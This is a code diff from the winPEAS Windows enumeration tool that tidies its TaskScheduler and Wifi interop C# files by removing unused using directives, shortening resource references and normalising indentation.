-using System.Linq;
-using System.Text;
-using System.Threading.Tasks;
 
 namespace winPEAS.TaskScheduler
 {

winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskFolder.cs

@@ -1,13 +1,10 @@
 using System;
 using System.Collections.Generic;
 using System.IO;
-using System.Linq;
 using System.Runtime.InteropServices;
 using System.Security;
 using System.Security.AccessControl;
-using System.Text;
 using System.Text.RegularExpressions;
-using System.Threading.Tasks;
 using winPEAS.TaskScheduler.V1;
 using winPEAS.TaskScheduler.V2;
 

winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskFolderCollection.cs

@@ -2,10 +2,7 @@
 using System.Collections.Generic;
 using System.Collections.Specialized;
 using System.ComponentModel;
-using System.Linq;
 using System.Runtime.CompilerServices;
-using System.Text;
-using System.Threading.Tasks;
 using winPEAS.TaskScheduler.TaskEditor.Native;
 using winPEAS.TaskScheduler.V2;
 

winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskHandlerInterfaces.cs

@@ -1,9 +1,5 @@
 using System;
-using System.Collections.Generic;
-using System.Linq;
 using System.Runtime.InteropServices;
-using System.Text;
-using System.Threading.Tasks;
 
 namespace winPEAS.TaskScheduler
 {

winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskService.cs

@@ -2,10 +2,7 @@
 using System.Collections.Generic;
 using System.ComponentModel;
 using System.IO;
-using System.Linq;
 using System.Runtime.InteropServices;
-using System.Text;
-using System.Threading.Tasks;
 using winPEAS.TaskScheduler.V1;
 using winPEAS.TaskScheduler.V2;
 
@@ -718,7 +715,7 @@ namespace winPEAS.TaskScheduler
             }
             else
             {
-				taskPath = System.IO.Path.GetFileNameWithoutExtension(taskPath);
+                taskPath = Path.GetFileNameWithoutExtension(taskPath);
                 var iTask = GetTask(v1TaskScheduler, taskPath);
                 if (iTask != null)
                     t = new Task(this, iTask);
@@ -746,7 +743,7 @@ namespace winPEAS.TaskScheduler
         public TaskDefinition NewTaskFromFile([NotNull] string xmlFile)
         {
             var td = NewTask();
-			td.XmlText = System.IO.File.ReadAllText(xmlFile);
+            td.XmlText = File.ReadAllText(xmlFile);
             return td;
         }
 

winPEAS/winPEASexe/winPEAS/TaskScheduler/Trigger.cs

@@ -2,11 +2,9 @@
 using System.Collections.Generic;
 using System.ComponentModel;
 using System.Globalization;
-using System.Linq;
 using System.Runtime.CompilerServices;
 using System.Runtime.InteropServices;
 using System.Text;
-using System.Threading.Tasks;
 using System.Xml.Serialization;
 using winPEAS.Properties;
 using winPEAS.TaskScheduler.V1;
@@ -217,7 +215,7 @@ namespace winPEAS.TaskScheduler
 
         /// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
         /// <returns>String describing the trigger.</returns>
-		protected override string V2GetTriggerString() => Properties.Resources.TriggerBoot1;
+        protected override string V2GetTriggerString() => Resources.TriggerBoot1;
     }
 
     /// <summary>
@@ -419,8 +417,8 @@ namespace winPEAS.TaskScheduler
         /// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
         /// <returns>String describing the trigger.</returns>
         protected override string V2GetTriggerString() => DaysInterval == 1 ?
-			string.Format(Properties.Resources.TriggerDaily1, AdjustToLocal(StartBoundary)) :
+            string.Format(Resources.TriggerDaily1, AdjustToLocal(StartBoundary)) :
-			string.Format(Properties.Resources.TriggerDaily2, AdjustToLocal(StartBoundary), DaysInterval);
+            string.Format(Resources.TriggerDaily2, AdjustToLocal(StartBoundary), DaysInterval);
 
         private void ReadMyXml(System.Xml.XmlReader reader)
         {
@@ -633,13 +631,13 @@ namespace winPEAS.TaskScheduler
         protected override string V2GetTriggerString()
         {
             if (!GetBasic(out var log, out var source, out var id))
-				return Properties.Resources.TriggerEvent1;
+                return Resources.TriggerEvent1;
             var sb = new StringBuilder();
-			sb.AppendFormat(Properties.Resources.TriggerEventBasic1, log);
+            sb.AppendFormat(Resources.TriggerEventBasic1, log);
             if (!string.IsNullOrEmpty(source))
-				sb.AppendFormat(Properties.Resources.TriggerEventBasic2, source);
+                sb.AppendFormat(Resources.TriggerEventBasic2, source);
             if (id.HasValue)
-				sb.AppendFormat(Properties.Resources.TriggerEventBasic3, id.Value);
+                sb.AppendFormat(Resources.TriggerEventBasic3, id.Value);
             return sb.ToString();
         }
     }
@@ -674,7 +672,7 @@ namespace winPEAS.TaskScheduler
 
         /// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
         /// <returns>String describing the trigger.</returns>
-		protected override string V2GetTriggerString() => Properties.Resources.TriggerIdle1;
+        protected override string V2GetTriggerString() => Resources.TriggerIdle1;
     }
 
     /// <summary>
@@ -761,8 +759,8 @@ namespace winPEAS.TaskScheduler
         /// <returns>String describing the trigger.</returns>
         protected override string V2GetTriggerString()
         {
-			var user = string.IsNullOrEmpty(UserId) ? Properties.Resources.TriggerAnyUser : UserId;
+            var user = string.IsNullOrEmpty(UserId) ? Resources.TriggerAnyUser : UserId;
-			return string.Format(Properties.Resources.TriggerLogon1, user);
+            return string.Format(Resources.TriggerLogon1, user);
         }
     }
 
@@ -971,7 +969,7 @@ namespace winPEAS.TaskScheduler
             var ww = TaskEnumGlobalizer.GetString(WeeksOfMonth);
             var days = TaskEnumGlobalizer.GetString(DaysOfWeek);
             var months = TaskEnumGlobalizer.GetString(MonthsOfYear);
-			return string.Format(Properties.Resources.TriggerMonthlyDOW1, AdjustToLocal(StartBoundary), ww, days, months);
+            return string.Format(Resources.TriggerMonthlyDOW1, AdjustToLocal(StartBoundary), ww, days, months);
         }
 
         /// <summary>Reads the subclass XML for V1 streams.</summary>
@@ -1249,11 +1247,11 @@ namespace winPEAS.TaskScheduler
         /// <returns>String describing the trigger.</returns>
         protected override string V2GetTriggerString()
         {
-			var days = string.Join(Properties.Resources.ListSeparator, Array.ConvertAll(DaysOfMonth, i => i.ToString()));
+            var days = string.Join(Resources.ListSeparator, Array.ConvertAll(DaysOfMonth, i => i.ToString()));
             if (RunOnLastDayOfMonth)
-				days += (days.Length == 0 ? "" : Properties.Resources.ListSeparator) + Properties.Resources.WWLastWeek;
+                days += (days.Length == 0 ? "" : Resources.ListSeparator) + Resources.WWLastWeek;
             var months = TaskEnumGlobalizer.GetString(MonthsOfYear);
-			return string.Format(Properties.Resources.TriggerMonthly1, AdjustToLocal(StartBoundary), days, months);
+            return string.Format(Resources.TriggerMonthly1, AdjustToLocal(StartBoundary), days, months);
         }
 
         /// <summary>
@@ -1428,7 +1426,7 @@ namespace winPEAS.TaskScheduler
 
         /// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
         /// <returns>String describing the trigger.</returns>
-		protected override string V2GetTriggerString() => Properties.Resources.TriggerRegistration1;
+        protected override string V2GetTriggerString() => Resources.TriggerRegistration1;
     }
 
     /// <summary>Defines how often the task is run and how long the repetition pattern is repeated after the task is started.</summary>
@@ -1770,10 +1768,10 @@ namespace winPEAS.TaskScheduler
         /// <returns>String describing the trigger.</returns>
         protected override string V2GetTriggerString()
         {
-			var str = Properties.Resources.ResourceManager.GetString("TriggerSession" + StateChange.ToString());
+            var str = Resources.ResourceManager.GetString("TriggerSession" + StateChange.ToString());
-			var user = string.IsNullOrEmpty(UserId) ? Properties.Resources.TriggerAnyUser : UserId;
+            var user = string.IsNullOrEmpty(UserId) ? Resources.TriggerAnyUser : UserId;
             if (StateChange != TaskSessionStateChangeType.SessionLock && StateChange != TaskSessionStateChangeType.SessionUnlock)
-				user = string.Format(Properties.Resources.TriggerSessionUserSession, user);
+                user = string.Format(Resources.TriggerSessionUserSession, user);
             return string.Format(str, user);
         }
 
@@ -1839,7 +1837,7 @@ namespace winPEAS.TaskScheduler
 
         /// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
         /// <returns>String describing the trigger.</returns>
-		protected override string V2GetTriggerString() => string.Format(Properties.Resources.TriggerTime1, AdjustToLocal(StartBoundary));
+        protected override string V2GetTriggerString() => string.Format(Resources.TriggerTime1, AdjustToLocal(StartBoundary));
     }
 
     /// <summary>
@@ -1946,7 +1944,7 @@ namespace winPEAS.TaskScheduler
                 if (v2Trigger != null)
                 {
                     if (value <= StartBoundary)
-						throw new ArgumentException(Properties.Resources.Error_TriggerEndBeforeStart);
+                        throw new ArgumentException(Resources.Error_TriggerEndBeforeStart);
                     v2Trigger.EndBoundary = value == DateTime.MaxValue ? null : value.ToString(V2BoundaryDateFormat, DefaultDateCulture);
                 }
                 else
@@ -2063,7 +2061,7 @@ namespace winPEAS.TaskScheduler
                 if (v2Trigger != null)
                 {
                     if (value > EndBoundary)
-						throw new ArgumentException(Properties.Resources.Error_TriggerEndBeforeStart);
+                        throw new ArgumentException(Resources.Error_TriggerEndBeforeStart);
                     v2Trigger.StartBoundary = value == DateTime.MinValue ? null : value.ToString(V2BoundaryDateFormat, DefaultDateCulture);
                 }
                 else
@@ -2381,7 +2379,7 @@ namespace winPEAS.TaskScheduler
             v2Trigger = iTriggers.Create(ttype);
             Marshal.ReleaseComObject(iTriggers);
             if ((unboundValues.TryGetValue("StartBoundary", out var dt) ? (DateTime)dt : StartBoundary) > (unboundValues.TryGetValue("EndBoundary", out dt) ? (DateTime)dt : EndBoundary))
-				throw new ArgumentException(Properties.Resources.Error_TriggerEndBeforeStart);
+                throw new ArgumentException(Resources.Error_TriggerEndBeforeStart);
             foreach (var key in unboundValues.Keys)
             {
                 try
@@ -2406,7 +2404,7 @@ namespace winPEAS.TaskScheduler
             if (v1TriggerData.MinutesInterval != 0 && v1TriggerData.MinutesInterval >= v1TriggerData.MinutesDuration)
                 throw new ArgumentException("Trigger.Repetition.Interval must be less than Trigger.Repetition.Duration under Task Scheduler 1.0.");
             if (v1TriggerData.EndDate <= v1TriggerData.BeginDate)
-				throw new ArgumentException(Properties.Resources.Error_TriggerEndBeforeStart);
+                throw new ArgumentException(Resources.Error_TriggerEndBeforeStart);
             if (v1TriggerData.BeginDate == DateTime.MinValue)
                 v1TriggerData.BeginDate = DateTime.Now;
             v1Trigger?.SetTrigger(ref v1TriggerData);
@@ -2456,13 +2454,13 @@ namespace winPEAS.TaskScheduler
             var ret = new StringBuilder();
             if (Repetition.Interval != TimeSpan.Zero)
             {
-				var sduration = Repetition.Duration == TimeSpan.Zero ? Properties.Resources.TriggerDuration0 : string.Format(Properties.Resources.TriggerDurationNot0, GetBestTimeSpanString(Repetition.Duration));
+                var sduration = Repetition.Duration == TimeSpan.Zero ? Resources.TriggerDuration0 : string.Format(Resources.TriggerDurationNot0, GetBestTimeSpanString(Repetition.Duration));
-				ret.AppendFormat(Properties.Resources.TriggerRepetition, GetBestTimeSpanString(Repetition.Interval), sduration);
+                ret.AppendFormat(Resources.TriggerRepetition, GetBestTimeSpanString(Repetition.Interval), sduration);
             }
             if (EndBoundary != DateTime.MaxValue)
-				ret.AppendFormat(Properties.Resources.TriggerEndBoundary, AdjustToLocal(EndBoundary));
+                ret.AppendFormat(Resources.TriggerEndBoundary, AdjustToLocal(EndBoundary));
             if (ret.Length > 0)
-				ret.Insert(0, Properties.Resources.HyphenSeparator);
+                ret.Insert(0, Resources.HyphenSeparator);
             return ret.ToString();
         }
     }
@@ -2609,7 +2607,7 @@ namespace winPEAS.TaskScheduler
         protected override string V2GetTriggerString()
         {
             var days = TaskEnumGlobalizer.GetString(DaysOfWeek);
-			return string.Format(WeeksInterval == 1 ? Properties.Resources.TriggerWeekly1Week : Properties.Resources.TriggerWeeklyMultWeeks, AdjustToLocal(StartBoundary), days, WeeksInterval);
+            return string.Format(WeeksInterval == 1 ? Resources.TriggerWeekly1Week : Resources.TriggerWeeklyMultWeeks, AdjustToLocal(StartBoundary), days, WeeksInterval);
         }
 
         /// <summary>Reads the subclass XML for V1 streams.</summary>
@@ -2775,8 +2773,8 @@ namespace winPEAS.TaskScheduler
             var rp = (RepetitionPattern)value;
             if (destinationType != typeof(string)) return base.ConvertTo(context, culture, value, destinationType);
             if (rp.Interval == TimeSpan.Zero) return "";
-			var sduration = rp.Duration == TimeSpan.Zero ? Properties.Resources.TriggerDuration0 : string.Format(Properties.Resources.TriggerDurationNot0Short, Trigger.GetBestTimeSpanString(rp.Duration));
+            var sduration = rp.Duration == TimeSpan.Zero ? Resources.TriggerDuration0 : string.Format(Resources.TriggerDurationNot0Short, Trigger.GetBestTimeSpanString(rp.Duration));
-			return string.Format(Properties.Resources.TriggerRepetitionShort, Trigger.GetBestTimeSpanString(rp.Interval), sduration);
+            return string.Format(Resources.TriggerRepetitionShort, Trigger.GetBestTimeSpanString(rp.Interval), sduration);
         }
     }
 }

winPEAS/winPEASexe/winPEAS/TaskScheduler/TriggerCollection.cs

@@ -3,11 +3,8 @@ using System.Collections;
 using System.Collections.Generic;
 using System.Collections.Specialized;
 using System.ComponentModel;
-using System.Linq;
 using System.Runtime.CompilerServices;
 using System.Runtime.InteropServices;
-using System.Text;
-using System.Threading.Tasks;
 using System.Xml.Serialization;
 using winPEAS.TaskScheduler.TaskEditor.Native;
 using winPEAS.TaskScheduler.V1;

winPEAS/winPEASexe/winPEAS/TaskScheduler/User.cs

@@ -1,9 +1,5 @@
 using System;
-using System.Collections.Generic;
-using System.Linq;
 using System.Security.Principal;
-using System.Text;
-using System.Threading.Tasks;
 using winPEAS.TaskScheduler.TaskEditor.Native;
 
 namespace winPEAS.TaskScheduler

winPEAS/winPEASexe/winPEAS/TaskScheduler/Wildcard.cs

@@ -1,9 +1,4 @@
-using System;
+using System.Text.RegularExpressions;
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
-using System.Text.RegularExpressions;
-using System.Threading.Tasks;
 
 namespace winPEAS.TaskScheduler
 {
@@ -30,12 +25,12 @@ namespace winPEAS.TaskScheduler
         /// <returns>A regular expression equivalent of the given wildcard.</returns>
         public static string WildcardToRegex([NotNull] string pattern)
         {
-			string s = Regex.Escape(pattern);
+            string s = Escape(pattern);
-			s = Regex.Replace(s, @"(?<!\\)\\\*", @".*"); // Negative Lookbehind
+            s = Replace(s, @"(?<!\\)\\\*", @".*"); // Negative Lookbehind
-			s = Regex.Replace(s, @"\\\\\\\*", @"\*");
+            s = Replace(s, @"\\\\\\\*", @"\*");
-			s = Regex.Replace(s, @"(?<!\\)\\\?", @".");  // Negative Lookbehind
+            s = Replace(s, @"(?<!\\)\\\?", @".");  // Negative Lookbehind
-			s = Regex.Replace(s, @"\\\\\\\?", @"\?");
+            s = Replace(s, @"\\\\\\\?", @"\?");
-			return string.Concat("^", Regex.Replace(s, @"\\\\\\\\", @"\\"), "$");
+            return string.Concat("^", Replace(s, @"\\\\\\\\", @"\\"), "$");
         }
     }
 }

winPEAS/winPEASexe/winPEAS/TaskScheduler/WindowsImpersonatedIdentity.cs

@@ -1,14 +1,9 @@
 using System;
-using System.Collections.Generic;
 using System.ComponentModel;
-using System.Linq;
 using System.Runtime.InteropServices;
 using System.Security.Principal;
-using System.Text;
-using System.Threading.Tasks;
 using winPEAS.Native;
 using winPEAS.Native.Classes;
-using winPEAS.TaskScheduler.TaskEditor.Native;
 
 namespace winPEAS.TaskScheduler
 {

winPEAS/winPEASexe/winPEAS/TaskScheduler/XmlSerializationHelper.cs

@@ -1,10 +1,8 @@
 using System;
 using System.Collections.Generic;
 using System.ComponentModel;
-using System.Linq;
 using System.Reflection;
 using System.Text;
-using System.Threading.Tasks;
 using System.Xml;
 using System.Xml.Serialization;
 

winPEAS/winPEASexe/winPEAS/Wifi/NativeWifiApi/Interop.cs

@@ -1,7 +1,5 @@
-using System;
+using System.ComponentModel;
-using System.ComponentModel;
 using System.Diagnostics;
-using System.Runtime.InteropServices;
 
 namespace winPEAS.Wifi.NativeWifiApi
 {

winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user

@@ -5,7 +5,7 @@
     </StartArguments>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
-    <StartArguments>fileanalysis</StartArguments>
+    <StartArguments>fileanalysis debug</StartArguments>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
     <StartArguments>debug</StartArguments>